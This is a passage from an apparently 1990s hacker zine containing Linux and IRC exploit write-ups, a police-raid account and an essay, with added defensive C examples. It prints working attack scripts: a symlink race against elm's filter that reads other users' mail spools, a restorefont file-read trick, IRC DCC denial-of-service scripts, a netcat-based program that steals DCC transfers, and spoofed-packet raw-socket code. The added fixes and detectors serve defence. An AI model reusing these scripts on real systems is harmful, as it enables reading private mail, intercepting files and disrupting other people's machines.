                            8k in size on local filesystems
Synopsis:                   restorefont reads a font file while suid root,
                            writing it to video memory as the current vga
                            font; anyone at console can read the current
                            font to a file, allowing you to use video memory
                            as an 8k file buffer.

rfbug.sh:
#!/bin/sh
restorefont -w /tmp/deffont.tmp
restorefont -r $1
restorefont -w $2
restorefont -r /tmp/deffont.tmp
rm -f /tmp/deffont.tmp
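
How the read path could give up its privileges the way the write path is
said to, as an added example that is not svgalib's code: the effective uid
is switched to the invoking user's for the open, so the kernel applies that
user's file permissions, and is restored afterwards. The function name
read_font_as_invoker is an assumption; FONT_SIZE is the value from the
excerpt above.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define FONT_SIZE 8192

/* Reads exactly FONT_SIZE bytes of `path` into `font` using the rights of
 * the user who started the program. In a suid root binary geteuid() is 0
 * and getuid() is the caller, so the open below fails for any file the
 * caller could not have read directly. Returns 0 on success, -1 otherwise. */
int read_font_as_invoker(const char *path, unsigned char *font)
{
    uid_t privileged = geteuid();
    size_t total = 0;
    ssize_t got;
    int fd;

    if (seteuid(getuid()) < 0)          /* drop before touching the file */
        return -1;
    fd = open(path, O_RDONLY);
    if (seteuid(privileged) < 0) {      /* regain for the later VGA access */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd < 0)
        return -1;

    /* The descriptor was obtained with the caller's rights, so reading
     * from it after regaining privileges exposes nothing new. */
    while (total < FONT_SIZE &&
           (got = read(fd, font + total, FONT_SIZE - total)) > 0)
        total += (size_t)got;
    close(fd);
    return total == FONT_SIZE ? 0 : -1; /* short file: "input file corrupted" */
}

int main(int argc, char **argv)
{
    static unsigned char font[FONT_SIZE];

    if (argc < 2) {
        fprintf(stderr, "usage: %s fontfile\n", argv[0]);
        return 2;
    }
    if (read_font_as_invoker(argv[1], font) < 0) {
        fprintf(stderr, "cannot read %d font bytes from %s\n",
                FONT_SIZE, argv[1]);
        return 1;
    }
    puts("font data read with the invoking user's permissions");
    return 0;
}
```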



<---------------------------------------------------------------------------->

Linux 'filter' Security Holes
by FEH Staff

The elm filter under linux runs setgid mail, thus allowing it to freely
read and write from users' mail spools. It is only through the integrity
of its code that the security of linux's mail system is protected; and in
this respect it falls short. In FEH #2, we printed mail-clobber, code
that exploited filter in order to destroy a user's mail spool. But, the
capabilities to exploit filter extend beyond destruction of a mail spool,
you can also use it to read a mail spool.
The specific problem that is exploited in this hole is the way filter
uses a temporary file to store the input to it, and then subsequently send
it back out according to the filter. Because of the modularity of the
coding, in the main filter.c, the temporary file is opened, and then written
to; after which it is closed. The mailmessage function is then called, with
the purpose of forwarding that mail, written to the temporary file, to
whatever destination is specified in the filter. At the start of this
process, the temporary file is opened, and the contents of it are dumped
to the mail spool of the user the mail is being forwarded to.
At any point after the file has been initially opened by the main filter
function, since the user running filter has permissions on that temp file,
it can be rm'd. The temp file existing can then be replaced with a symbolic
link to any file that group mail has read permissions on. When it is opened
in the mailmessage function, the symbolic link is followed and whatever file
that was pointed to will be read in, and the contents forwarded to the user
specified in the mail spool.
The complete exploit is shown below:

Program:                    filter, an elm utility
Affected Operating Systems: linux
Requirements:               account on machine
Security Compromise:        user can read any mail spool readable by grp mail.
                            (usually everything, sometimes not root)
Synopsis:                   filter writes out the mail to be forwarded to a
                            temporary file, which is then closed and reopened;
                            if when the temporary file is reopened it is a
                            symlink to a mail spool, filter will proceed
                            to forward the contents of that file as if it was
                            the original message.

fread.sh:
#!/bin/sh
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp
echo From: ReDragon > /tmp/fread-msg.tmp
echo To: $LOGNAME >> /tmp/fread-msg.tmp
echo Subject: Filter Exploit >> /tmp/fread-msg.tmp
echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
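
The close-then-reopen window described above, reproduced inside a private
scratch directory and set beside two ways of closing it. This is an added
example, not code from filter or from the original article; the function
names, scratch paths and file contents are constructed for the illustration.

```c
#define _GNU_SOURCE   /* mkdtemp() and O_NOFOLLOW under strict -std= modes */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Fix 1: rewind and read the descriptor that created the file; no name lookup. */
ssize_t read_from_start(int fd, char *buf, size_t cap)
{
    ssize_t n;
    size_t total = 0;
    if (lseek(fd, 0, SEEK_SET) < 0)
        return -1;
    while (total < cap - 1 && (n = read(fd, buf + total, cap - 1 - total)) > 0)
        total += (size_t)n;
    buf[total] = '\0';
    return (ssize_t)total;
}

/* The pattern described above: the file was closed, so the NAME is trusted again. */
ssize_t reopen_by_name(const char *path, char *buf, size_t cap)
{
    ssize_t n;
    int fd = open(path, O_RDONLY);      /* follows a symlink sitting at path */
    if (fd < 0)
        return -1;
    n = read_from_start(fd, buf, cap);
    close(fd);
    return n;
}

/* Fix 2: if a reopen is unavoidable, refuse symlinks and require the same inode. */
int reopen_checked(const char *path, const struct stat *orig)
{
    struct stat now;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &now) != 0 ||
        now.st_dev != orig->st_dev || now.st_ino != orig->st_ino) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private directory.  Result bits:
 *   1 = reopen-by-name returned the other file's contents
 *   2 = same-descriptor read still returned the original message
 *   4 = checked reopen refused the swapped path
 * Returns -1 if the scratch files could not be set up. */
int demo_swap(void)
{
    char dir[] = "/tmp/toctou-demo-XXXXXX";
    char tmp[64], other[64], buf[128];
    const char *msg = "original message\n";
    const char *spool = "contents of some other file\n";
    struct stat orig;
    int fd, ofd, cfd, result = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(tmp, sizeof tmp, "%s/filter.XXXXXX", dir);
    snprintf(other, sizeof other, "%s/spool", dir);
    ofd = open(other, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (ofd < 0 || write(ofd, spool, strlen(spool)) < 0)
        return -1;
    close(ofd);
    fd = mkstemp(tmp);                  /* O_CREAT|O_EXCL, mode 0600 */
    if (fd < 0 || write(fd, msg, strlen(msg)) < 0 || fstat(fd, &orig) != 0)
        return -1;

    /* The window: the name now refers to a different file. */
    if (unlink(tmp) != 0 || symlink(other, tmp) != 0)
        return -1;

    if (reopen_by_name(tmp, buf, sizeof buf) > 0 && strcmp(buf, spool) == 0)
        result |= 1;
    if (read_from_start(fd, buf, sizeof buf) > 0 && strcmp(buf, msg) == 0)
        result |= 2;
    if ((cfd = reopen_checked(tmp, &orig)) < 0)
        result |= 4;
    else
        close(cfd);

    close(fd); unlink(tmp); unlink(other); rmdir(dir);
    return result;
}

int main(void)
{
    printf("demo_swap() = %d (7: name hijacked, fd safe, reopen refused)\n", demo_swap());
    return 0;
}
```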




<---------------------------------------------------------------------------->

IRC DCC Protocol Security Holes
by FEH Staff


DCC is the IRC client-side protocol used to send information directly
between clients. Normally, when a message is sent between 2 users, it goes
from the user's client to the irc server that client is connected to, then to
the server the receiver is connected to, and finally to the user. Obviously
that is a lot of wasted bandwidth compared to sending information directly
between two clients, thus DCC is used.
DCC is among the simplest of setups for communication, consisting merely of
a tcp connection between two computers, across which data is passed. Since
error correction, flow control, etc. are already handled by the tcp protocol,
there is no need to worry about any such issues.
When you initiate a dcc send, a number of things happen:
   1. Your irc client opens an unprivileged tcp port (>1024), and listens
      for an incoming connection.
   2. Your irc client sends:
        A) The file name
        B) Your ip address
        C) The number of the tcp port it is listening on
        D) The size of the file you are sending (in bytes)
   3. The remote irc client then opens a tcp connection to the specified
      ip address, transmits a bit of garbage to initiate the transfer, and
      dumps whatever is sent over that tcp port to a file.
   4. At the time the first connection to the tcp port is established,
      your irc client stops listening for new connections, and dumps the
      file over the now-established tcp connection.

What you can do with this:
The simplest uses of this setup are denial-of-service attacks. Some IRC
clients (ircII earlier than 2.8.2 and Homer) hang while trying to establish a
dcc connection. Thus, by placing the ip address of a nonexistent machine in
your dcc send request, you can cause the irc client of a user who chose to get
the file to hang long enough to cause a ping timeout. (Note: for readability,
the actual control characters in this script have been replaced with ascii
representations; to actually execute it, convert accordingly.)

dcckill.irc:
echo Loading DCC KILL
echo Syntax: DCCK nick filename size
echo ^Bfilename^B and ^Bsize^B are bogus values.
alias DCCK {
^assign dcc_killing 0
//quote PRIVMSG $0 :^ADCC SEND $1 12341234 4321 $2^A
echo *** Sent DCC KILL request to $0
^assign dcc_killing 1
}
--- cut here ---

A similar trick, less damaging, but quite capable of confusing the hell
out of a lot of people is to direct remote irc clients to connect to the
chargen port of some machine on a T3. (Note that ircII will not connect
to a privileged port, although all of the GUI clients I have tested
will.) You can thus use somebody else's bandwidth to dump garbage to a
remote machine.

dccchargen.irc:
echo Loading DCC CHARGEN
echo Syntax: DCCCHARGEN nick filename size
echo ^Bfilename^B and ^Bsize^B are bogus values.
alias DCCCHARGEN {
^assign dcc_charging 0
//quote PRIVMSG $0 :^ADCC SEND $1 2230084270 19 $2^A
echo *** Sent DCC CHARGEN request to $0
^assign dcc_charging 1
}
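
On the receiving side, both tricks above rely on the client connecting to
whatever address and port the offer names. The following added example (not
from the article or from any IRC client; the function names, the acceptance
policy and the sample offers are assumptions) parses a DCC SEND offer and vets
it before any connection is attempted.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum dcc_verdict { DCC_OK, DCC_MALFORMED, DCC_BAD_PORT, DCC_BAD_ADDR, DCC_ADDR_MISMATCH };

struct dcc_offer {
    char name[256];
    uint32_t addr;      /* IPv4 address, carried in the message as one decimal integer */
    unsigned port;
    uint32_t size;
};

/* Parse one unsigned decimal field (1-10 digits, value <= max); advance *p past it. */
static int dec_field(const char **p, unsigned long long max, unsigned long long *out)
{
    unsigned long long v = 0;
    int digits = 0;

    while (**p >= '0' && **p <= '9') {
        if (++digits > 10)
            return -1;
        v = v * 10 + (unsigned long long)(**p - '0');
        (*p)++;
    }
    if (digits == 0 || v > max)
        return -1;
    *out = v;
    return 0;
}

/* Parse "^ADCC SEND <name> <addr> <port> <size>^A", where ^A is the byte 0x01. */
int dcc_parse(const char *msg, struct dcc_offer *o)
{
    static const char prefix[] = "\001DCC SEND ";
    unsigned long long addr, port, size;
    const char *p = msg;
    size_t n;

    if (strncmp(p, prefix, sizeof prefix - 1) != 0)
        return -1;
    p += sizeof prefix - 1;
    n = strcspn(p, " \001");
    if (n == 0 || n >= sizeof o->name || p[n] != ' ')
        return -1;
    memcpy(o->name, p, n);
    o->name[n] = '\0';
    p += n + 1;
    if (dec_field(&p, 0xFFFFFFFFULL, &addr) || *p++ != ' ' ||
        dec_field(&p, 65535, &port) || *p++ != ' ' ||
        dec_field(&p, 0xFFFFFFFFULL, &size) || p[0] != '\001' || p[1] != '\0')
        return -1;
    o->addr = (uint32_t)addr;
    o->port = (unsigned)port;
    o->size = (uint32_t)size;
    return 0;
}

/* Policy applied before connecting.  sender_addr is the IPv4 address the offer
 * really came from (assumption: the caller resolved the sender's user@host). */
enum dcc_verdict dcc_vet(const char *msg, uint32_t sender_addr, struct dcc_offer *o)
{
    unsigned top;

    if (dcc_parse(msg, o) != 0)
        return DCC_MALFORMED;
    if (o->port < 1024)                         /* chargen (19) and other services */
        return DCC_BAD_PORT;
    top = o->addr >> 24;
    if (top == 0 || top == 127 || top >= 224)   /* 0/8, loopback, multicast/reserved */
        return DCC_BAD_ADDR;
    if (o->addr != sender_addr)                 /* offer points at a third machine */
        return DCC_ADDR_MISMATCH;
    return DCC_OK;
}

int main(void)
{
    /* Constructed offers; 192.0.2.10 and 198.51.100.7 are documentation addresses. */
    static const char *samples[] = {
        "\001DCC SEND notes.txt 3221225994 5000 2048\001", /* 192.0.2.10, the sender   */
        "\001DCC SEND notes.txt 12341234 4321 2048\001",   /* values from dcckill.irc  */
        "\001DCC SEND notes.txt 3221225994 19 2048\001",   /* privileged port 19       */
        "\001DCC SEND notes.txt 3325256711 5000 2048\001", /* 198.51.100.7, not sender */
    };
    struct dcc_offer o;
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %u -> verdict %d\n", (unsigned)i,
               (int)dcc_vet(samples[i], 3221225994u, &o));
    return 0;
}
```

The address comparison is a strict policy chosen for this example; a client
whose peers sit behind address translation would have to relax it.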


Aside from denial of service attacks, the primary interesting thing you
can do is intercept dcc file transfers. Because ircII listens for
incoming connections from ANY machine when you do a dcc send, all that is
needed is to open a tcp connection to the appropriate port (using netcat
for example), dump a few garbage characters to initiate the transfer, and
then store whatever comes across the tcp connection in a file. You lose
the filename, but for those who are willing to take a hex editor to the
first few bytes of what they get, figuring out what the file format is
should be no problem.
The simplest way to determine which port a dcc transfer is going to be on
is if you have user access on the machine. If you watch for new listens on
ephemeral ports (using netstat or equivalent), you can then quickly open them,
before the actual recipient has a chance to do so.
Here is a quick linux-only program to parse the output of netstat -a, and
dump the contents of whatever dcc sends start from the local machine to a
file.

dccgrab.c:
/* dccgrab 0.01 */
/* A quick program to intercept dcc sends. */
/* Obviously, don't use this without appropriate permission. */
/* Requires that a copy of netcat be in the path, and a copy of */
/* netcat's telnet.d file needs to be in the current directory */
/* output will be written to snagfile */
/* known bugs: bot detection should be improved */
/* Only works with linux netstat */

#include <stdio.h>
#include <string.h>

#define TRUE 1
#define FALSE 0

int main (){
int SnaggedOne;
FILE *f;
char NetstatLine [1024];
char CommandString [1024];
char *colin = ":";
char *tempstr;
int port;
int i;

port=1;
SnaggedOne=FALSE;

while (!SnaggedOne){
system ("netstat -a |egrep LISTEN |egrep ':' >/tmp/.dcc2345");
f=fopen ("/tmp/.dcc2345","rt");
if (f==NULL) {
fprintf (stderr,"Unable to open file!");
exit (1);
}

port =0;
while (port == 0) {
fgets (&NetstatLine[0],1024,f);
tempstr = strstr (&NetstatLine[0],colin);
tempstr += sizeof (char);
sscanf (tempstr,"%d ",&port);

/* let's deal with ports we don't want to touch */
if (port < 1024) /* privileged */
port=0;
if (port == 6000) /* X */
port=0;
if (port == 8080) /* proxy servers */
port=0;
/* bots... */
if (port == 2222)
port=0;
if (port == 3333)
port=0;
if (port == 4444)
port=0;
if (port == 5555)
port=0;
if (port == 6666)
port=0;
if (port == 7777)
port=0;
if (port == 8888)
port=0;
if (port == 9999)
port=0;
if (feof (f))
port=-1;
}

fclose (f);
if (port >0) {
SnaggedOne=TRUE;
printf ("snagging something from port %d\n",port);
sprintf (&CommandString[0],"nc 127.0.0.1 %d < ./telnet.d > snagfile",port);
system (CommandString);
}
else sleep (1);
} /* while !snaggedone*/
return 0;
}

This is obviously not the optimal solution for stealing dcc transfers, and
only works locally, but it provides a good basis for working on your own code
to improve upon.
If you can determine which port the kernel on a remote system assigned
last, you stand a good chance at guessing the port number for the next dcc
send, simply because most kernels assign tcp ports in increasing order. Thus,
if you can get a bot to dcc chat you, and you record the port number, and then
bombard the next 30 or so tcp ports with attempted connections, you stand a
very good chance at getting the next file that that bot happens to send
somebody. Actual implementation of this is left as an exercise to our readers.
Good Luck!

<---------------------------------------------------------------------------->

Example Packet Construction Code
by SnoCrash

/* Send a "Christmas Tree Packet" (SYN, URG, PSH, FIN and 1 Byte of data) */
/* from source.port to dest.port. This type of packet is also known as a */
/* "Kamikaze Packet", "Nastygram", and "lamp test segment". */

pktsend.h:
/* Prototypes. */
int sendpkt_tcp(struct sockaddr_in *, unsigned short int, char *, unsigned
short int, unsigned long int, unsigned long int, unsigned short int,
unsigned short int, unsigned char, unsigned long int, unsigned long int);

int sendpkt_udp(struct sockaddr_in *, unsigned short int, char *, unsigned
short int, unsigned long int, unsigned long int, unsigned short int,
unsigned short int);

/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
*/

unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/

while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}

/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}

/* Send faked TCP packet. */
int
sendpkt_tcp(sin, s, data, datalen, saddr, daddr, sport, dport, flags, seq, ack)
struct sockaddr_in *sin;
unsigned short int sport, dport, s, datalen;
unsigned long int daddr, saddr, seq, ack;
unsigned char flags;
char *data;
{
struct iphdr ip;
struct tcphdr tcp;
static char packet[8192];
unsigned short int len=0;
char tcpbuf[8192];
char *p;

/* Fill in IP Header values. */
ip.ihl = 5;
ip.version = 4;
ip.tos = 0;
ip.tot_len = htons(40 + datalen);
ip.id = htons(31337 + (rand()%100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_TCP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum((char *)&ip, sizeof(ip));

/* Fill in TCP Header values. */
tcp.th_sport = htons(sport);
tcp.th_dport = htons(dport);
tcp.th_seq = htonl(seq);
tcp.th_ack = htonl(ack);
tcp.th_x2 = 0;
tcp.th_off = 5;
tcp.th_flags = flags;
tcp.th_win = htons(10052);
tcp.th_sum = 0;
tcp.th_urp = 0;

/* Add crap for our TCP checksum. */
memset(tcpbuf, 0, 8192);
p = tcpbuf;
memcpy(p, &(ip.saddr), 8); /* This will copy saddr & daddr into the buffer */
p += 9; /* Skip the 0 operator */
memcpy(p++, &(ip.protocol), 1);
len = htons(datalen + sizeof(tcp));
memcpy(p, &(len), 2);
p += 2;
memcpy(p, &tcp, sizeof(tcp)+datalen);

/* Now fill in the checksum. */
tcp.th_sum = in_cksum((char *)tcpbuf, sizeof(tcp)+12+datalen);

/* Now we copy our packet into a nice character array for sending. */
memcpy(packet, (char *)&ip, sizeof(ip));
memcpy(packet+sizeof(ip), (char *)&tcp, sizeof(tcp));
memcpy(packet+sizeof(ip)+sizeof(tcp), (char *)data, datalen);

/* And send... */
return(sendto(s, packet, sizeof(ip)+sizeof(tcp)+datalen, 0, (struct
sockaddr *)sin, sizeof(struct sockaddr_in)));

}

/* Send faked UDP packet. */
int
sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];

/* Fill in IP header values. */
ip.ihl = 5;
ip.version = 4;
ip.tos = 0;
ip.tot_len = htons(28 + datalen);
ip.id = htons(31337 + (rand()%100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum((char *)&ip, sizeof(ip));

/* Fill in UDP header values. Checksums are unnecessary. */
udp.source = htons(sport);
udp.dest = htons(dport);
udp.len = htons(8 + datalen);
udp.check = (unsigned short int)NULL;

/* Copy the headers into our character array. */
memcpy(packet, (char *)&ip, sizeof(ip));
memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp));
memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen);

return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0, (struct
sockaddr *)sin, sizeof(struct sockaddr_in)));

}
-- cut here --

treelight.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <netdb.h>

#include "pktsend.h"

#define err(x) { fprintf(stderr, x); exit(1); }

unsigned long int
resolve(host)
char host[255];
{
unsigned long int addr;
struct hostent *he;

if((he = gethostbyname(host)) == NULL){
if((he = gethostbyaddr(host, strlen(host), AF_INET)) == NULL)
return -1;
}

bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));
return(addr);
}

void
main(argc, argv)
int argc; char **argv;
{
unsigned long int saddr, daddr;
unsigned short int sport, dport;
struct sockaddr_in sin;
int s;

if(argc!=5)
err("Usage: treelight <source_addr> <source_port> <dest_addr> <dest_port>\n");

/* Resolve Addresses. */
if((saddr=resolve(argv[1])) == -1)
err("Unable to resolve source address.\n");

if((daddr=resolve(argv[3])) == -1)
err("Unable to resolve destination address.\n");

/* Convert port numbers to integers. */
sport=(unsigned short int)atoi(argv[2]);
dport=(unsigned short int)atoi(argv[4]);

/* Open raw socket. */
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err("Unable to open raw socket.\n");

sin.sin_family = AF_INET;
sin.sin_addr.s_addr= daddr;
sin.sin_port = dport;

if((sendpkt_tcp(&sin, s, "1", 1, saddr, daddr, sport, dport,
TH_SYN|TH_URG|TH_PUSH|TH_FIN, 2387283, 2387238)) == -1)
err("Error sending our rad little packet.\n");
}
-- cut here --
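
From the receiving end, a segment with the flag set treelight uses is easy to
recognise, because SYN and FIN never legitimately appear together. This added
example (not part of the original code; the names and the sample packet bytes
are constructed) classifies a raw, unfragmented IPv4/TCP packet by header
checksum and flag combination.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { F_FIN = 0x01, F_SYN = 0x02, F_RST = 0x04, F_PSH = 0x08, F_ACK = 0x10, F_URG = 0x20 };

enum verdict { PKT_OK, PKT_MALFORMED, PKT_NOT_TCP, PKT_FRAGMENT,
               PKT_BAD_IP_SUM, PKT_SYN_FIN, PKT_SYN_RST, PKT_NO_FLAGS };

/* One's-complement Internet checksum over big-endian 16-bit words. */
static uint16_t inet_sum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;

    while (len > 1) {
        sum += ((uint32_t)p[0] << 8) | p[1];
        p += 2;
        len -= 2;
    }
    if (len)
        sum += (uint32_t)p[0] << 8;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Classify one packet that starts at the IPv4 header. */
enum verdict classify(const uint8_t *pkt, size_t len)
{
    size_t ihl;
    uint8_t flags;

    if (len < 20 || (pkt[0] >> 4) != 4)
        return PKT_MALFORMED;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 20)
        return PKT_MALFORMED;
    if (pkt[9] != 6)                            /* protocol field: 6 = TCP */
        return PKT_NOT_TCP;
    if (((pkt[6] & 0x1f) << 8 | pkt[7]) != 0)   /* later fragment: no TCP header here */
        return PKT_FRAGMENT;
    if (inet_sum(pkt, ihl) != 0)                /* a valid header sums to zero */
        return PKT_BAD_IP_SUM;
    flags = pkt[ihl + 13] & 0x3f;
    if ((flags & F_SYN) && (flags & F_FIN))
        return PKT_SYN_FIN;
    if ((flags & F_SYN) && (flags & F_RST))
        return PKT_SYN_RST;
    if (flags == 0)
        return PKT_NO_FLAGS;
    return PKT_OK;
}

/* Constructed 41-byte sample: 20-byte IP header, 20-byte TCP header, 1 data byte.
 * Addresses are documentation ranges (192.0.2.1 -> 198.51.100.2). */
size_t sample_packet(uint8_t *out, uint8_t flags)
{
    static const uint8_t ip[20] = { 0x45, 0, 0, 41,  0x7a, 0x69, 0, 0,
                                    255, 6, 0, 0,  192, 0, 2, 1,  198, 51, 100, 2 };
    uint16_t c;

    memset(out, 0, 41);
    memcpy(out, ip, sizeof ip);
    c = inet_sum(out, 20);                      /* checksum field is zero here */
    out[10] = (uint8_t)(c >> 8);
    out[11] = (uint8_t)(c & 0xff);
    out[20] = 0x04; out[21] = 0xd2;             /* source port 1234 */
    out[22] = 0x00; out[23] = 0x50;             /* destination port 80 */
    out[32] = 5 << 4;                           /* data offset: 5 words */
    out[33] = flags;
    out[40] = '1';
    return 41;
}

int main(void)
{
    uint8_t pkt[64];
    size_t n = sample_packet(pkt, F_SYN | F_URG | F_PSH | F_FIN);

    printf("SYN|URG|PSH|FIN -> verdict %d\n", (int)classify(pkt, n));
    n = sample_packet(pkt, F_SYN);
    printf("SYN only        -> verdict %d\n", (int)classify(pkt, n));
    return 0;
}
```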






<---------------------------------------------------------------------------->



Breakfast with the Secret Service
by Kamakize



September 8th 1995 6:42 am.
The phone rings. I let it ring a few times, then roll over and pick it up
only to hear a dial tone. I open my eyes and look over towards my caller-id
box to see who it was. The display is blank, according to the machine, the
phone never rang. Confused, but more concerned with sleep at the moment, I
closed my eyes and drifted back to sle....BEWM, my door slams open. My head
against my pillow, my eyes bulge as two large men enter my room and pronounce:
"Secret Service". They each grab an arm and drag me down the stairs, while
they informed me "cellular phone fraud is costing the United States one million
dollars a day". Some days being a hacker is less fun than others.
They started by asking me if anyone was home. They then slapped me with
the warrant and let in about 4 local police officers from the county.
They opened my parents room and said "Treasury Department" and grabbed them
to the kitchen table, and then asked for all weapons in the house. Having
unloaded the sole gun in the house, the search commenced.
First they asked for cooperation, and started taking the basic information
from me: Name, SSN, Address (WHY? WHY did they ask for the address, when they
were at the damn place?), and all phone numbers of the house, plus releases
to search the cars (a search warrant for a HOUSE does NOT include the cars or
"out buildings" on your premises, only the main building). By the time they
got us all down it was about 7:15am, and they started to ask basic questions
that your school or any credit agency knows when you apply for something,
(ie: employment history, etc.. wage at work, salary, etc.)
Then, the Computer Expert from DC came in and started to fool with our
family's business computer, and after scanning it, decided to let it be, since
he found nothing wrong. Then they visited my room (without my presence) and
searched my room somewhat half-ass, as if they weren't finding what they
wanted. Finally, they gave up, since I never had what they were looking for
to begin with.
They took me outside, and started questioning me. They kept asking me
WHERE is the EPROM burner, over and over, WHERE is the EPROM burner? Since
there wasn't one, that line of questioning wasn't going very far. I told them
I never cloned phones, and didn't know. They frowned.
Then they started to ask me what I knew about PMF. At this time when they
out of the blue said "PMF", I suddenly knew why they were there. I had an
account on his board, and had downloaded how-to files on cloning phones. Well,
information isn't illegal, but apparently it is enough for a search warrant.
I was taken outside countless times, and around 11:00am they let me sit down
and wait out the remainder of their search. They never once looked at my
computer on-line, not once. But finally, around 12:30pm they brought me up
to my room to show me what they were going to take with them; at 12:45pm they
left.
September 18th, two weeks after the search, they had me go downtown to
"sign a few papers and documents." I have yet to hear a word back, and
apparently the people in New Jersey working on the case are not talking much.
That day, the agents told me that they would get back to us before christmas.
Christmas has come and gone.
Six people were arrested in "Cybersnare", but there have not been any
arrests after that day. They were after people for cell phone cloning, and
for selling actual credit cards. It was all a result of people using Celco 51,
for more information about that read the article in FEH #2; a brief outline
is provided below.
In January of 1995, PMF came onto irc, pushing his bbs, demanding that you
prove you can get on by showing your knowledge of cell phones. In reality,
it wasn't PMF at all that was really running the board, it was 'Carder One'
that was behind it. It was set up in PMF's apartment building, and he took
care of it snitching on whatever.
In June, he went to Summercon '95 (a public hacker convention), a lot of his
'friends' were there.. but they didn't know until 3 months later, he would
turn the table over. While he was there he had 2 cellular phones, he showed
me one. While outside on the street in Atlanta, I asked him 'is that legit?'
He promptly said "What do you think?". I asked him again. That was ONE
question he would never answer. Now we know.

Possessions seized from me:
9/8/95 - 6:40am Date + Time warrant served.
1) packard bell monitor mode # and serial # listed
1) computer - CTG (no serial #)
1) model 5001 focus keyboard serial #
1) PC concepts mt 767 - power director Serial #
1) HP desk Jet 500C serial #
1) Caller Identification box - slim light , model #64
103) 3.5" floppy diskettes
Miscellaneous cables and connectors
4) boxes removed from car, misc documents
1) book: "Internet firewalls and network security"

That's all. Weird eh? Taking the power director. Taking an ink jet, when
asked why the guy said so we can tell if you printed these documents here, I
said from an INK JET? (hmmm makes me wonder if the government has high
technology to summon ink back into a cart and see if it matches the same ink
in the cart).
Over all there was one nice agent there, he did talk about the SS some while
the others did their duty. They were there for about 7 hours, with a few
county cops coming and going. Strange, the raid didn't seem as "scary" as it
should have been. Two weeks later the media came calling to me. 2 weeks.

<---------------------------------------------------------------------------->

---------------------------------------------------------------------

I'm a Hacker, You're a Hacker, wouldn't you like to be a Hacker too..

- Some thoughts from Mythrandir

---------------------------------------------------------------------

Hackers are everywhere. They are in the news. They are in the media.
They are on the news groups. They are on IRC. And they are multiplying
at an exponential rate. Right?... Nope.
But this is the way that the world sees it. This is the way that the
policy makers view the situation. This is the way that all of these so called
new hackers believe is happening.
The revolution is here! Let's cause havoc and fight the system. Destroy
big brother. We can free the information. We can liberate. Let's hack
into machines with all of these scripts that are around. Let's get
information from everyone. We can get free access to AOL.
We can steal money from people. We can take whatever we want. We are elite.
Right?... Nope.
What in the world is happening? Of course it is quite simple. Hacking
has moved into the mainstream. It has been glamourized by the media. It is
almost a household word. I wouldn't be surprised if we get trading cards.
It'd be more interesting than the OJ Simpson trading cards..
Because of this, everyone is thinking that "hacking" is cool. It
seems like every kid in the country wants to be a hacker. Everyone is building
redboxes and running AOHell.
With all of this, I think it is time for a little re-education.
You see it is real simple. So simple that it defies so many. Tools do not
make a hacker. Breaking into machines does not make you a hacker.
Talking like you are elite does not make you a hacker. Only one thing makes
you a hacker.

Your Mind.

Be Elite, think first, ask questions later.

- Mythrandir
mythrndr@infonexus.com




<---------------------------------------------------------------------------->

